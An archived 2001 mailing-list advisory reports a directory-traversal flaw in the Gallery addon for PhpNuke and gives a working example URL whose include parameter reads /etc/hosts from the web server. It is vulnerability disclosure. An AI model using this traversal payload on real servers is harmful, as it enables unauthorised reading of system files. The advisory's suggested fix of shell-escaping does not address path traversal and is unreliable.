Gallery Addon for PhpNuke remote file viewing vulnerability

From: Cabezon Aurélien (aurelien.cabezonat_private)
Date: Sat Nov 17 2001 - 18:18:26 PST

Next message: Thomas C. Greene: "(2) IE cookies assigned to RAM disk survive reboot -- and history too"

Previous message: Florian Weimer: "Re: Analysis of SSH crc32 compensation attack detector exploit"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Gallery Addon for PhpNuke remote file viewing vulnerability

Problem discovered: 18/10/2001 by Cabezon Aurélien |
aurelien.cabezonat_private

[1] Description

Gallery is an intuitive web based photo gallery with authenticated users and
privileged albums.
Photo management includes automatic thumbnails, resizing, rotation, etc.
Gallery is available as a Nuke 5.0 module.

Gallery Addon is vulnerable to the ../.. bug that allow remote file reading
on the web server as whatever
user runs the web server.

[2] Exploit

http://www.somehost.com/modules.php?set_albumName=album01&id=aaw&op=modload&
name=gallery&file=index&inclu
de=../../../../../../etc/hosts

[3] Fix

Coder has been alerted.
An easy way to fix such a vulnerability is to use the PHP included "system
escapeshell" function.

[4] Informations bout Gallery Addon for PhpNuke

http://www.menalto.com/projects/gallery-nuke/
Author: bharatat_private

---
Cabezon Aurélien
http://www.iSecureLabs.com
aurelien.cabezon@iSecureLabs.

Next message: Thomas C. Greene: "(2) IE cookies assigned to RAM disk survive reboot -- and history too"
Previous message: Florian Weimer: "Re: Analysis of SSH crc32 compensation attack detector exploit"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Nov 19 2001 - 13:25:52 PST